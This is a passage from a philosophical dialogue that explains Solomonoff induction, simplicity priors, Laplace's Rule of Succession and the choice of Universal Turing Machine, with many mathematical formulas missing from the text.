prediction only errs by a bounded amount, over infinite time, relative to the best computable sequence predictor. We can also see it as formalizing the intuitive idea that was expressed by William Ockham a few centuries earlier that simpler theories are more likely to be correct, and as telling us that 'simplicity' should be measured in algorithmic complexity, which is the size of a computer program required to output a hypothesis's predictions. ASHLEY: I think I would have to read more on this subject to actually follow that. What I'm hearing is that Solomonoff induction is a reputable idea that is important because it gives us a kind of ideal for sequence prediction. This ideal also has something to do with Occam's Razor, and stakes a claim that the simplest theory is the one that can be represented by the shortest computer program. You identify this with "doing good epistemology". BLAINE: Yes, those are legitimate takeaways. Another way of looking at it is that Solomonoff induction is an ideal but uncomputable answer to the question "What should our priors be?", which is left open by understanding Bayesian updating. ASHLEY: Can you say how Solomonoff induction answers the question of, say, the prior probability that Canada is planning to invade the United States? I once saw a crackpot website that tried to invoke Bayesian probability about it, but only after setting the prior at 10% or something like that, I don't recall exactly. Does Solomonoff induction let me tell him that he's making a math error, instead of just calling him silly in an informal fashion? BLAINE: If you're expecting to sit down with Leibniz and say, "Gentlemen, let us calculate" then you're setting your expectations too high. Solomonoff gives us an idea of how we should compute that quantity given unlimited computing power. It doesn't give us a firm recipe for how we can best approximate that ideal in real life using bounded computing power, or human brains. That's like expecting to play perfect chess after you read Shannon's 1950 paper. But knowing the ideal, we can extract some intuitive advice that might help our online crackpot if only he'd listen. ASHLEY: But according to you, Solomonoff induction does say in principle what is the prior probability that Canada will invade the United States. BLAINE: Yes, up to a choice of universal Turing machine. ASHLEY: (looking highly skeptical) So I plug a universal Turing machine into the formalism, and in principle, I get out a uniquely determined probability that Canada invades the USA. BLAINE: Exactly! ASHLEY: Uh huh. Well, go on. BLAINE: So, first, we have to transform this into a sequence prediction problem. ASHLEY: Like a sequence of years in which Canada has and hasn't invaded the US, mostly zero except around 1812— BLAINE: No! To get a good prediction about Canada we need much more data than that, and I don't mean a graph of Canadian GDP either. Imagine a sequence that contains all the sensory data you have ever received over your lifetime. Not just the hospital room that you saw when you opened your eyes right after your birth, but the darkness your brain received as input while you were still in your mother's womb. Every word you've ever heard. Every letter you've ever seen on a computer screen, not as ASCII letters but as the raw pattern of neural impulses that gets sent down from your retina. ASHLEY: That seems like a lot of data and some of it is redundant, like there'll be lots of similar pixels for blue sky— BLAINE: That data is what you got as an agent. If we want to translate the question of the prediction problem Ashley faces into theoretical terms, we should give the sequence predictor all the data that you had available, including all those repeating blue pixels of the sky. Who knows? Maybe there was a Canadian warplane somewhere in there, and you didn't notice. ASHLEY: But it's impossible for my brain to remember all that data. If we neglect for the moment how the retina actually works and suppose that I'm seeing the same @60Hz feed the robot would, that's far more data than my brain can realistically learn per second. BLAINE: So then Solomonoff induction can do better than you can, using its unlimited computing power and memory. That's fine. ASHLEY: But what if you can do better by forgetting more? BLAINE: If you have limited computing power, that makes sense. With unlimited computing power, that really shouldn't happen and that indeed is one of the lessons of Solomonoff induction. An unbounded Bayesian never expects to do worse by updating on another item of evidence—for one thing, you can always just do the same policy you would have used if you hadn't seen that evidence. That kind of lesson is one of the lessons that might not be intuitively obvious, but which you can feel more deeply by walking through the math of probability theory. With unlimited computing power, nothing goes wrong as a result of trying to process 4 gigabits per second; every extra bit just produces a better expected future prediction. ASHLEY: Okay, so we start with literally all the data I have available. That's 4 gigabits per second if we imagine frames of 32-bit pixels repeating 60 times per second. Though I remember hearing 100 megabits per second would be a better estimate of what the retina sends out, and that it's pared down to 1 megabit per second very quickly by further processing. BLAINE: Right. We start with all of that data, going back to when you were born. Or maybe when your brain formed in the womb, though it shouldn't make much difference. ASHLEY: I note that there are some things I know that don't come from my sensory inputs at all. Chimpanzees learn to be afraid of skulls and snakes much faster than they learn to be afraid of other arbitrary shapes. I was probably better at learning to walk in Earth gravity than I would have been at navigating in zero G. Those are heuristics I'm born with, based on how my brain was wired, which ultimately stems from my DNA specifying the way that proteins should fold to form neurons—not from any photons that entered my eyes later. BLAINE: So, for purposes of following along with the argument, let's say that your DNA is analogous to the code of a computer program that makes predictions. What you're observing here is that humans have 750 megabytes of DNA, and even if most of that is junk and not all of what's left is specifying brain behavior, it still leaves a pretty large computer program that could have a lot of prior information programmed into it. Let's say that your brain, or rather, your infant pre-brain wiring algorithm, was effectively a 7.5 megabyte program—if it's actually 75 megabytes, that makes little difference to the argument. By exposing that 7.5 megabyte program to all the information coming in from your eyes, ears, nose, proprioceptive sensors telling you where your limbs were, and so on, your brain updated itself into forming the modern Ashley, whose hundred trillion synapses might be encoded by, say, one petabyte of information. ASHLEY: The thought does occur to me that some environmental phenomena have effects on me that can't be interpreted as "sensory information" in any simple way, like the direct effect that alcohol has on my neurons, and how that feels to me from the inside. But it would be perverse to claim that this prevents you from trying to summarize all the information that the Ashley-agent receives into a single sequence, so I won't press the point. (ELIEZER: (whispering) More on this topic later.) ASHLEY: Oh, and for completeness's sake, wouldn't there also be further information embedded in the laws of physics themselves? Like, the way my brain executes implicitly says something about the laws of physics in the universe I'm in. BLAINE: Metaphorically speaking, our laws of physics would play the role of a particular choice of Universal Turing Machine, which has some effect on which computations count as "simple" inside the Solomonoff formula. But normally, the UTM should be very simple compared to the amount of data in the sequence we're trying to predict, just like the laws of physics are very simple compared to a human brain. In terms of algorithmic complexity, the laws of physics are very simple compared to watching a @60Hz visual field for a day. ASHLEY: Part of my mind feels like the laws of physics are quite complicated compared to going outside and watching a sunset. Like, I realize that's false, but I'm not sure how to say out loud exactly why it's false... BLAINE: Because the algorithmic complexity of a system isn't measured by how long a human has to go to college to understand it, it's measured by the size of the computer program required to generate it. The language of physics is differential equations, and it turns out that this is something difficult to beat into some human brains, but differential equations are simple to program into a simple Turing Machine. ASHLEY: Right, like, the laws of physics actually have much fewer details to them than, say, human nature. At least on the Standard Model of Physics. I mean, in principle there could be another decillion undiscovered particle families out there. BLAINE: The concept of "algorithmic complexity" isn't about seeing something with lots of gears and details, it's about the size of computer program required to compress all those details. The Mandelbrot set looks very complicated visually, you can keep zooming in using more and more detail, but there's a very simple rule that generates it, so we say the algorithmic complexity is very low. ASHLEY: All the visual information I've seen is something that happens within the physical universe, so how can it be more complicated than the universe? I mean, I have a sense on some level that this shouldn't be a problem, but I don't know why it's not a problem. BLAINE: That's because particular parts of the universe can have much higher algorithmic complexity than the entire universe! Consider a library that contains all possible books. It's very easy to write a computer program that generates all possible books. So any particular book in the library contains much more algorithmic information than the entire library; it contains the information required to say 'look at this particular book here'. If pi is normal, then somewhere in its digits is a copy of Shakespeare's Hamlet—but the number saying which particular digit of pi to start looking at, will be just about exactly as large as Hamlet itself. The copy of Shakespeare's Hamlet that exists in the decimal expansion of pi is more complex than pi itself. If you zoomed way in and restricted your vision to a particular part of the Mandelbrot set, what you saw might be much more algorithmically complex than the entire Mandelbrot set, because the specification has to say where in the Mandelbrot set you are. Similarly, the world Earth is much more algorithmically complex than the laws of physics. Likewise, the visual field you see over the course of a second can easily be far more algorithmically complex than the laws of physics. ASHLEY: Okay, I think I get that. And similarly, even though the ways that proteins fold up are very complicated, in principle we could get all that info using just the simple fundamental laws of physics plus the relatively simple DNA code for the protein. There are all sorts of obvious caveats about epigenetics and so on, but those caveats aren't likely to change the numbers by a whole order of magnitude. BLAINE: Right! ASHLEY: So the laws of physics are, like, a few kilobytes, and my brain has say 75 megabytes of innate wiring instructions. And then I get to see a lot more information than that over my lifetime, like a megabit per second after my initial visual system finishes preprocessing it, and then most of that is forgotten. Uh... what does that have to do with Solomonoff induction again? BLAINE: Solomonoff induction quickly catches up to any single computer program at sequence prediction, even if the original program is very large and contains a lot of prior information about the environment. If a program is 75 megabytes long, it can only predict 75 megabytes worth of data better than the Solomonoff inductor before the Solomonoff inductor catches up to it. That doesn't mean that a Solomonoff inductor knows everything a baby does after the first second of exposure to a webcam feed, but it does mean that after the first second, the Solomonoff inductor is already no more surprised than a baby by the vast majority of pixels in the next frame. Every time the Solomonoff inductor assigns half as much probability as the baby to the next pixel it sees, that's one bit spent permanently out of the 75 megabytes of error that can happen before the Solomonoff inductor catches up to the baby. That your brain is written in the laws of physics also has some implicit correlation with the environment, but that's like saying that a program is written in the same programming language as the environment. The language can contribute something to the power of the program, and the environment being written in the same programming language can be a kind of prior knowledge. But if Solomonoff induction starts from a standard Universal Turing Machine as its language, that doesn't contribute any more bits of lifetime error than the complexity of that programming language in the UTM. ASHLEY: Let me jump back a couple of steps and return to the notion of my brain wiring itself up in response to environmental information. I'd expect an important part of that process was my brain learning to control the environment, not just passively observing it. Like, it mattered to my brain's wiring algorithm that my brain saw the room shift in a certain way when it sent out signals telling my eyes to move. BLAINE: Indeed. But talking about the sequential control problem is more complicated math. AIXI is the ideal agent that uses Solomonoff induction as its epistemology and expected reward as its decision theory. That introduces extra complexity, so it makes sense to talk about just Solomonoff induction first. We can talk about AIXI later. So imagine for the moment that we were just looking at your sensory data, and trying to predict what would come next in that. ASHLEY: Wouldn't it make more sense to look at the brain's inputs and outputs, if we wanted to predict the next input? Not just look at the series of previous inputs? BLAINE: It'd make the problem easier for a Solomonoff inductor to solve, sure; but it also makes the problem more complicated. Let's talk instead about what would happen if you took the complete sensory record of your life, gave it to an ideally smart agent, and asked the agent to predict what you would see next. Maybe the agent could do an even better job of prediction if we also told it about your brain's outputs, but I don't think that subtracting the outputs would leave it helpless to see patterns in the inputs. ASHLEY: It sounds like a pretty hard problem to me, maybe even an unsolvable one. I'm thinking of the distinction in computer science between needing to learn from non-chosen data, versus learning when you can choose particular queries. Learning can be much faster in the second case. BLAINE: In terms of what can be predicted in principle given the data, what facts are actually reflected in it that Solomonoff induction might uncover, we shouldn't imagine a human trying to analyze the data. We should imagine an entire advanced civilization pondering it for years. If you look at it from that angle, then the alien civilization isn't going to balk at the fact that it's looking at the answers to the queries that Ashley's brain chose, instead of the answers to the queries it chose itself. Like, if the Ashley had already read Shakespeare's Hamlet—if the image of those pages had already crossed the sensory stream—and then the Ashley saw a mysterious box outputting 20, 15, 2, 5, 15, 18, I think somebody eavesdropping on that sensory data would be equally able to guess that this was encoding 'tobeor' and guess that the next thing the Ashley saw might be the box outputting 14. You wouldn't even need an entire alien civilization of superintelligent cryptographers to guess that. And it definitely wouldn't be a killer problem that Ashley was controlling the eyeball's saccades, even if you could learn even faster by controlling the eyeball yourself. So far as the computer-science distinction goes, Ashley's eyeball is being controlled to make intelligent queries and seek out useful information; it's just Ashley controlling the eyeball instead of you—that eyeball is not a query-oracle answering random questions. ASHLEY: Okay, I think this example is helping my understanding of what we're doing here. In the case above, the next item in the Ashley-sequence wouldn't actually be 14. It would be this huge visual field that showed the box flashing a little picture of '14'. BLAINE: Sure. Otherwise it would be a rigged demo, as you say. ASHLEY: I think I'm confused about the idea of predicting the visual field. It seems to me that what with all the dust specks in my visual field, and maybe my deciding to tilt my head using motor instructions that won't appear in the sequence, there's no way to exactly predict the 66-megabit integer representing the next visual frame. So it must be doing something other than the equivalent of guessing "14" in a simpler sequence, but I'm not sure what. BLAINE: Indeed, there'd be some element of thermodynamic and quantum randomness preventing that exact prediction even in principle. So instead of predicting one particular next frame, we put a probability distribution on it. ASHLEY: A probability distribution over possible 66-megabit frames? Like, a table with entries, summing to 1? BLAINE: Sure. isn't a large number when you have unlimited computing power. As Martin Gardner once observed, "Most finite numbers are very much larger." Like I said, Solomonoff induction is an epistemic ideal that requires an unreasonably large amount of computing power. ASHLEY: I don't deny that big computations can sometimes help us understand little ones. But at the point when we're talking about probability distributions that large, I have some trouble holding onto what the probability distribution is supposed to mean. BLAINE: Really? Just imagine a probability distribution over possibilities, then let go to . If we were talking about a letter ranging from A to Z, then putting 100 times as much probability mass on (X, Y, Z) as on the rest of the alphabet, would say that although you didn't know exactly what letter would happen, you expected it would be toward the end of the alphabet. You would have used 26 probabilities, summing to 1, to precisely state that prediction. In Solomonoff induction, since we have unlimited computing power, we express our uncertainty about a video frame the same way. All the various pixel fields you could see if your eye jumped to a plausible place, saw a plausible number of dust specks, and saw the box flash something that visually encoded '14', would have high probability. Pixel fields where the box vanished and was replaced with a glow-in-the-dark unicorn would have very low, though not zero, probability. ASHLEY: Can we really get away with viewing things that way? BLAINE: If we could not make identifications like these in principle, there would be no principled way in which we could say that you had ever expected to see something happen—no way to say that one visual field your eyes saw had higher probability than any other sensory experience. We couldn't justify science; we couldn't say that, having performed Galileo's experiment by rolling an inclined cylinder down a plane, Galileo's theory was thereby to some degree supported by having assigned a high relative probability to the only actual observations our eyes ever report. ASHLEY: I feel a little unsure of that jump, but I suppose I can go along with that for now. Then the question of "What probability does Solomonoff induction assign to Canada invading?" is to be identified, in principle, with the question "Given my past life experiences and all the visual information that's entered my eyes, what is the relative probability of seeing visual information that encodes Google News with the headline 'CANADA INVADES USA' at some point during the next 300 million seconds?" BLAINE: Right! ASHLEY: And Solomonoff induction has an in-principle way of assigning this a relatively low probability, which that online crackpot could do well to learn from as a matter of principle, even if he couldn't begin to carry out the exact calculations that involve assigning probabilities to exponentially vast tables. BLAINE: Precisely! ASHLEY: Fairness requires that I congratulate you on having come further in formalizing 'do good epistemology' as a sequence prediction problem than I previously thought you might. I mean, you haven't satisfied me yet, but I wasn't expecting you to get even this far. iii. Hypotheses BLAINE: Next, we consider how to represent a hypothesis inside this formalism. ASHLEY: Hmm. You said something earlier about updating on a probabilistic mixture of computer programs, which leads me to suspect that in this formalism, a hypothesis or way the world can be is a computer program that outputs a sequence of integers. BLAINE: There's indeed a version of Solomonoff induction that works like that. But I prefer the version where a hypothesis assigns probabilities to sequences. Like, if the hypothesis is that the world is a fair coin, then we shouldn't try to make that hypothesis predict "heads—tails—tails—tails—heads" but should let it just assign a prior probability to the sequence HTTTH. ASHLEY: I can see that for coins, but I feel a bit iffier on what this means as a statement about the real world. BLAINE: A single hypothesis inside the Solomonoff mixture would be a computer program that took in a series of video frames, and assigned a probability to each possible next video frame. Or for greater simplicity and elegance, imagine a program that took in a sequence of bits, ones and zeroes, and output a rational number for the probability of the next bit being '1'. We can readily go back and forth between a program like that, and a probability distribution over sequences. Like, if you can answer all of the questions, "What's the probability that the coin comes up heads on the first flip?", "What's the probability of the coin coming up heads on the second flip, if it came up heads on the first flip?", and "What's the probability that the coin comes up heads on the second flip, if it came up tails on the first flip?" then we can turn that into a probability distribution over sequences of two coinflips. Analogously, if we have a program that outputs the probability of the next bit, conditioned on a finite number of previous bits taken as input, that program corresponds to a probability distribution over infinite sequences of bits. ASHLEY: I think I followed along with that in theory, though it's not a type of math I'm used to (yet). So then in what sense is a program that assigns probabilities to sequences, a way the world could be—a hypothesis about the world? BLAINE: Well, I mean, for one thing, we can see the infant Ashley as a program with 75 megabytes of information about how to wire up its brain in response to sense data, that sees a bunch of sense data, and then experiences some degree of relative surprise. Like in the baby-looking-paradigm experiments where you show a baby an object disappearing behind a screen, and the baby looks longer at those cases, and so we suspect that babies have a concept of object permanence. ASHLEY: That sounds like a program that's a way Ashley could be, not a program that's a way the world could be. BLAINE: Those indeed are dual perspectives on the meaning of Solomonoff induction. Maybe we can shed some light on this by considering a simpler induction rule, Laplace's Rule of Succession, invented by the Reverend Thomas Bayes in the 1750s, and named after Pierre-Simon Laplace, the inventor of Bayesian reasoning. ASHLEY: Pardon me? BLAINE: Suppose you have a biased coin with an unknown bias, and every possible bias between and is equally probable. ASHLEY: Okay. Though in the real world, it's quite likely that an unknown frequency is exactly , , or . If you assign equal probability density to every part of the real number field between and , the probability of is . Indeed, the probability of all rational numbers put together is zero. BLAINE: The original problem considered by Thomas Bayes was about an ideal billiard ball bouncing back and forth on an ideal billiard table many times and eventually slowing to a halt; and then bouncing other billiards to see if they halted to the left or the right of the first billiard. You can see why, in first considering the simplest form of this problem without any complications, we might consider every position of the first billiard to be equally probable. ASHLEY: Sure. Though I note with pointless pedantry that if the billiard was really an ideal rolling sphere and the walls were perfectly reflective, it'd never halt in the first place. BLAINE: Suppose we're told that, after rolling the original billiard ball and then 5 more billiard balls, one billiard ball was to the right of the original, an R. The other four were to the left of the original, or Ls. Again, that's 1 R and 4 Ls. Given only this data, what is the probability that the next billiard ball rolled will be on the left of the original, another L? ASHLEY: Five sevenths. BLAINE: Ah, you've heard this problem before? ASHLEY: No, but it's obvious. BLAINE: Uh... really? ASHLEY: Combinatorics. Consider just the orderings of the balls, instead of their exact positions. Designate the original ball with the symbol ❚, the next five balls as LLLLR, and the next ball to be rolled as ✚. Given that the current ordering of these six balls is LLLL❚R and that all positions and spacings of the underlying balls are equally likely, after rolling the ✚, there will be seven equally likely orderings ✚LLLL❚R, L✚LLL❚R, LL✚LL❚R, and so on up to LLLL❚✚R and LLLL❚R✚. In five of those seven orderings, the ✚ is on the left of the ❚. In general, if we see of L and of R, the probability of the next item being an L is . BLAINE: Gosh... Well, the much more complicated proof originally devised by Thomas Bayes starts by considering every position of the original ball to be equally likely a priori, the additional balls as providing evidence about that position, and then integrating over the posterior probabilities of the original ball's possible positions to arrive at the probability that the next ball lands on the left or right. ASHLEY: Heh. And is all that extra work useful if you also happen to know a little combinatorics? BLAINE: Well, it tells me exactly how my beliefs about the original ball change with each new piece of evidence—the new posterior probability function on the ball's position. Suppose I instead asked you something along the lines of, "Given 4 L and 1 R, where do you think the original ball ✚ is most likely to be on the number line? How likely is it to be within 0.1 distance of there?" ASHLEY: That's fair; I don't see a combinatoric answer for the later part. You'd have to actually integrate over the density function . BLAINE: Anyway, let's just take at face value that Laplace's Rule of Succession says that, after observing 1s and 0s, the probability of getting a 1 next is . ASHLEY: But of course. BLAINE: We can consider Laplace's Rule as a short Python program that takes in a sequence of 1s and 0s, and spits out the probability that the next bit in the sequence will be 1. We can also consider it as a probability distribution over infinite sequences, like this: - 0 : - 1 : - 00 : - 01 : - 000 : - 001 : - 010 : ... and so on. Now, we can view this as a rule someone might espouse for predicting coinflips, but also view it as corresponding to a particular class of possible worlds containing randomness. I mean, Laplace's Rule isn't the only rule you could use. Suppose I had a barrel containing ten white balls and ten green balls. If you already knew this about the barrel, then after seeing white balls and green balls, you'd predict the next ball being white with probability . If you use Laplace's Rule, that's like believing the world was like a billiards table with an original ball rolling to a stop at a random point and new balls ending up on the left or right. If you use , that's like the hypothesis that there are ten green balls and ten white balls in a barrel. There isn't really a sharp border between rules we can use to predict the world, and rules for how the world behaves— ASHLEY: Well, that sounds just plain wrong. The map is not the territory, don'cha know? If Solomonoff induction can't tell the difference between maps and territories, maybe it doesn't contain all epistemological goodness after all. BLAINE: Maybe it'd be better to say that there's a dualism between good ways of computing predictions and being in actual worlds where that kind of predicting works well? Like, you could also see Laplace's Rule as implementing the rules for a world with randomness where the original billiard ball ends up in a random place, so that the first thing you see is equally likely to be 1 or 0. Then to ask what probably happens on round 2, we tell the world what happened on round 1 so that it can update what the background random events were. ASHLEY: Mmmaybe. BLAINE: If you go with the version where Solomonoff induction is over programs that just spit out a determined string of ones and zeroes, we could see those programs as corresponding to particular environments—ways the world could be that would produce our sensory input, the sequence. We could jump ahead and consider the more sophisticated decision-problem that appears in AIXI: an environment is a program that takes your motor outputs as its input, and then returns your sensory inputs as its output. Then we can see a program that produces Bayesian-updated predictions as corresponding to a hypothetical probabilistic environment that implies those updates, although they'll be conjugate systems rather than mirror images. ASHLEY:. BLAINE: I'm told the answers are the same but I confess I can't quite see why, unless there's some added assumption I'm missing. So let's talk about programs that assign probabilities for now, because I think that case is clearer. iv. Simplicity BLAINE: The next key idea is to prefer simple programs that assign high probability to our observations so far. ASHLEY: It seems like an obvious step, especially considering that you were already talking about "simple programs" and Occam's Razor a while back. Solomonoff induction is part of the Bayesian program of inference, right? BLAINE: Indeed. Very much so. ASHLEY: Okay, so let's talk about the program, or hypothesis, for "This barrel has an unknown frequency of white and green balls", versus the hypothesis "This barrel has 10 white and 10 green balls", versus the hypothesis, "This barrel always puts out a green ball after a white ball and vice versa." Let's say we see a green ball, then a white ball, the sequence GW. The first hypothesis assigns this probability , the second hypothesis assigns this probability or roughly , and the third hypothesis assigns probability . Now it seems to me that there's some important sense in which, even though Laplace's Rule assigned a lower probability to the data, it's significantly simpler than the second and third hypotheses and is the wiser answer. Does Solomonoff induction agree? BLAINE: I think you might be taking into account some prior knowledge that isn't in the sequence itself, there. Like, things that alternate either 101010... or 010101... are objectively simple in the sense that a short computer program simulates them or assigns probabilities to them. It's just unlikely to be true about an actual barrel of white and green balls. If 10 is literally the first sense data that you ever see, when you are a fresh new intelligence with only two bits to rub together, then "The universe consists of alternating bits" is no less reasonable than "The universe produces bits with an unknown random frequency anywhere between and ." ASHLEY: Conceded. But as I was going to say, we have three hypotheses that assigned , , and to the observed data; but to know the posterior probabilities of these hypotheses we need to actually say how relatively likely they were a priori, so we can multiply by the odds ratio. Like, if the prior odds were , the posterior odds would be . Now, how would Solomonoff induction assign prior probabilities to those computer programs? Because I remember you saying, way back when, that you thought Solomonoff was the answer to "How should Bayesians assign priors?" BLAINE: Well, how would you do it? ASHLEY: I mean... yes, the simpler rules should be favored, but it seems to me that there's some deep questions as to the exact relative 'simplicity' of the rules , or the rule , or the rule "alternate the bits"... BLAINE: Suppose I ask you to just make up some simple rule. ASHLEY: Okay, if I just say the rule I think you're looking for, the rule would be, "The complexity of a computer program is the number of bits needed to specify it to some arbitrary but reasonable choice of compiler or Universal Turing Machine, and the prior probability is to the power of the number of bits. Since, e.g., there's 32 possible 5-bit programs, so each such program has probability . So if it takes 16 bits to specify Laplace's Rule of Succession, which seems a tad optimistic, then the prior probability would be , which seems a tad pessimistic. BLAINE: Now just apply that rule to the infinity of possible computer programs that assign probabilities to the observed data, update their posterior probabilities based on the probability they've assigned to the evidence so far, sum over all of them to get your next prediction, and we're done. And yes, that requires a hypercomputer that can solve the halting problem, but we're talking ideals here. Let be the set of all programs and also written be the sense data so far, then ASHLEY: Uh. BLAINE: Yes? ASHLEY: Um... BLAINE: What is it? ASHLEY: You invoked a countably infinite set, so I'm trying to figure out if my predicted probability for the next bit must necessarily converge to a limit as I consider increasingly large finite subsets in any order. BLAINE: (sighs) Of course you are. ASHLEY: I think you might have left out some important caveats. Like, if I take the rule literally, then the program "0" has probability , the program "1" has probability , the program "01" has probability and now the total probability is which is too much. So I can't actually normalize it because the series sums to infinity. Now, this just means we need to, say, decide that the probability of a program having length 1 is , the probability of it having length 2 is , and so on out to infinity, but it's an added postulate. BLAINE: The conventional method is to require a prefix-free code. If "0111" is a valid program then "01110" cannot be a valid program. With that constraint, assigning " to the power of the length of the code", to all valid codes, will sum to less than ; and we can normalize their relative probabilities to get the actual prior. ASHLEY: Okay. And you're sure that it doesn't matter in what order we consider more and more programs as we approach the limit, because... no, I see it. Every program has positive probability mass, with the total set summing to , and Bayesian updating doesn't change that. So as I consider more and more programs, in any order, there are only so many large contributions that can be made from the mix—there's only so often that the final probability can change. Like, let's say there are at most 99 programs with probability 1% that assign probability to the next bit being a 1; that's only 99 times the final answer can go down by as much as , as the limit is approached. BLAINE: This idea generalizes, and is important. List all possible computer programs, in any order you like. Use any definition of simplicity that you like, so long as for any given amount of simplicity, there are only a finite number of computer programs that simple. As you go on carving off chunks of prior probability mass and assigning them to programs, it must be the case that as programs get more and complicated, their prior probability approaches zero!—though it's still positive for every finite program, because of Cromwell's Rule. You can't have more than 99 programs assigned 1% prior probability and still obey Cromwell's Rule, which means there must be some most complex program that is assigned 1% probability, which means every more complicated program must have less than 1% probability out to the end of the infinite list. ASHLEY: Huh. I don't think I've ever heard that justification for Occam's Razor before. I think I like it. I mean, I've heard a lot of appeals to the empirical simplicity of the world, and so on, but this is the first time I've seen a logical proof that, in the limit, more complicated hypotheses must be less likely than simple ones. BLAINE: Behold the awesomeness that. v. Choice of Universal Turing Machine ASHLEY: My next question is about the choice of Universal Turing Machine—the choice of compiler for our program codes. There's an infinite number of possibilities there, and in principle, the right choice of compiler can make our probability for the next thing we'll see be anything we like. At least I'd expect this to be the case, based on how the "problem of induction" usually goes. So with the right choice of Universal Turing Machine, our online crackpot can still make it be the case that Solomonoff induction predicts Canada invading the USA. BLAINE: One way of looking at the problem of good epistemology, I'd say, is that the job of a good epistemology is not to make it impossible to err. You can still blow off your foot if you really insist on pointing the shotgun at your foot and pulling the trigger. The job of good epistemology is to make it more obvious when you're about to blow your own foot off with a shotgun. On this dimension, Solomonoff induction excels. If you claim that we ought to pick an enormously complicated compiler to encode our hypotheses, in order to make the 'simplest hypothesis that fits the evidence' be one that predicts Canada invading the USA, then it should be obvious to everyone except you that you are in the process of screwing up. ASHLEY: Ah, but of course they'll say that their code is just the simple and natural choice of Universal Turing Machine, because they'll exhibit a meta-UTM which outputs that UTM given only a short code. And if you say the meta-UTM is complicated— BLAINE: Flon's Law says, "There is not now, nor has there ever been, nor will there ever be, any programming language in which it is the least bit difficult to write bad code." You can't make it impossible for people to screw up, but you can make it more obvious. And Solomonoff induction would make it even more obvious than might at first be obvious, because— ASHLEY: Your Honor, I move to have the previous sentence taken out and shot. BLAINE: Let's say that the whole of your sensory information is the string 10101010... Consider the stupid hypothesis, "This program has a 99% probability of producing a 1 on every turn", which you jumped to after seeing the first bit. What would you need to claim your priors were like—what Universal Turing Machine would you need to endorse—in order to maintain blind faith in that hypothesis in the face of ever-mounting evidence? ASHLEY: You'd need a Universal Turing Machine blind-utm that assigned a very high probability to the blind program "def ProbNextElementIsOne(previous_sequence): return 0.99". Like, if blind-utm sees the code 0, it executes the blind program "return 0.99". And to defend yourself against charges that your UTM blind-utm was not itself simple, you'd need a meta-UTM, blind-meta, which, when it sees the code 10, executes blind-utm. And to really wrap it up, you'd need to take a fixed point through all towers of meta and use diagonalization to create the UTM blind-diag that, when it sees the program code 0, executes "return 0.99", and when it sees the program code 10, executes blind-diag. I guess I can see some sense in which, even if that doesn't resolve Hume's problem of induction, anyone actually advocating that would be committing blatant shenanigans on a commonsense level, arguably more blatant than it would have been if we hadn't made them present the UTM. BLAINE: Actually, the shenanigans have to be much worse than that in order to fool Solomonoff induction. Like, Solomonoff induction using your blind-diag isn't fooled for a minute, even taking blind-diag entirely on its own terms. ASHLEY: Really? BLAINE: Assuming 60 sequence items per second? Yes, absolutely, Solomonoff induction shrugs off the delusion in the first minute, unless there are further and even more blatant shenanigans. We did require that your blind-diag be a Universal Turing Machine, meaning that it can reproduce every computable probability distribution over sequences, given some particular code to compile. Let's say there's a 200-bit code laplace for Laplace's Rule of Succession, "lambda sequence: return (sequence.count('1') + 1) / (len(sequence) + 2)", so that its prior probability relative to the 1-bit code for blind is . Let's say that the sense data is around 50/50 1s and 0s. Every time we see a 1, blind gains a factor of 2 over laplace (99% vs. 50% probability), and every time we see a 0, blind loses a factor of 50 over laplace (1% vs. 50% probability). On average, every 2 bits of the sequence, blind is losing a factor of 25 or, say, a bit more than 4 bits, i.e., on average blind is losing two bits of probability per element of the sequence observed. So it's only going to take 100 bits, or a little less than two seconds, for laplace to win out over blind. ASHLEY: I see. I was focusing on a UTM that assigned lots of prior probability to blind, but what I really needed was a compiler that, while still being universal and encoding every possibility somewhere, still assigned a really tiny probability to laplace, faircoin that encodes "return 0.5", and every other hypothesis that does better, round by round, than blind. So what I really need to carry off the delusion is obstinate-diag that is universal, assigns high probability to blind, requires billions of bits to specify laplace, and also requires billions of bits to specify any UTM that can execute laplace as a shorter code than billions of bits. Because otherwise we will say, "Ah, but given the evidence, this other UTM would have done better." I agree that those are even more blatant shenanigans than I thought. BLAINE: Yes. And even then, even if your UTM takes two billion bits to specify faircoin, Solomonoff induction will lose its faith in blind after seeing a billion bits. Which will happen before the first year is out, if we're getting 60 bits per second. And if you turn around and say, "Oh, well, I didn't mean that was my UTM, I really meant this was my UTM, this thing over here where it takes a trillion bits to encode faircoin", then that's probability-theory-violating shenanigans where you're changing your priors as you go. ASHLEY: That's actually a very interesting point—that what's needed for a Bayesian to maintain a delusion in the face of mounting evidence is not so much a blindly high prior for the delusory hypothesis, as a blind skepticism of all its alternatives. But what if their UTM requires a googol bits to specify faircoin? What if blind and blind-diag, or programs pretty much isomorphic to them, are the only programs that can be specified in less than a googol bits? BLAINE: Then your desire to shoot your own foot off has been made very, very visible to anyone who understands Solomonoff induction. We're not going to get absolutely objective prior probabilities as a matter of logical deduction, not without principles that are unknown to me and beyond the scope of Solomonoff induction. But we can make the stupidity really blatant and force you to construct a downright embarrassing Universal Turing Machine. ASHLEY: I guess I can see that. I mean, I guess that if you're presenting a ludicrously complicated Universal Turing Machine that just refuses to encode the program that would predict Canada not invading, that's more visibly silly than a verbal appeal that says, "But you must just have faith that Canada will invade." I guess part of me is still hoping for a more objective sense of "complicated". BLAINE: We could say that reasonable UTMs should contain a small number of wheels and gears in a material instantiation under our universe's laws of physics, which might in some ultimate sense provide a prior over priors. Like, the human brain evolved from DNA-based specifications, and the things you can construct out of relatively small numbers of physical objects are 'simple' under the 'prior' implicitly searched by natural selection. ASHLEY: Ah, but what if I think it's likely that our physical universe or the search space of DNA won't give us a good idea of what's complicated? BLAINE: For your alternative notion of what's complicated to go on being believed even as other hypotheses are racking up better experimental predictions, you need to assign a ludicrously low probability that our universe's space of physical systems buildable using a small number of objects, could possibly provide better predictions of that universe than your complicated alternative notion of prior probability. We don't need to appeal that it's a priori more likely than not that "a universe can be predicted well by low-object-number machines built using that universe's physics." Instead, we appeal that it would violate Cromwell's Rule, and would constitute exceedingly special pleading, to assign the possibility of a physically learnable universe a probability of less than . It then takes only a megabit of exposure to notice that the universe seems to be regular. ASHLEY: In other words, so long as you don't start with an absolute and blind prejudice against the universe being predictable by simple machines encoded in our universe's physics—so long as, on this planet of seven billion people, you don't assign probabilities less than to the other person being right about what is a good Universal Turing Machine—then the pure logic of Bayesian updating will rapidly force you to the conclusion that induction works. vi. Why algorithmic complexity? ASHLEY: Hm. I don't know that good pragmatic answers to the problem of induction were ever in short supply. Still, on the margins, it's a more forceful pragmatic answer than the last one I remember hearing. BLAINE: Yay! Now isn't Solomonoff induction wonderful? ASHLEY: 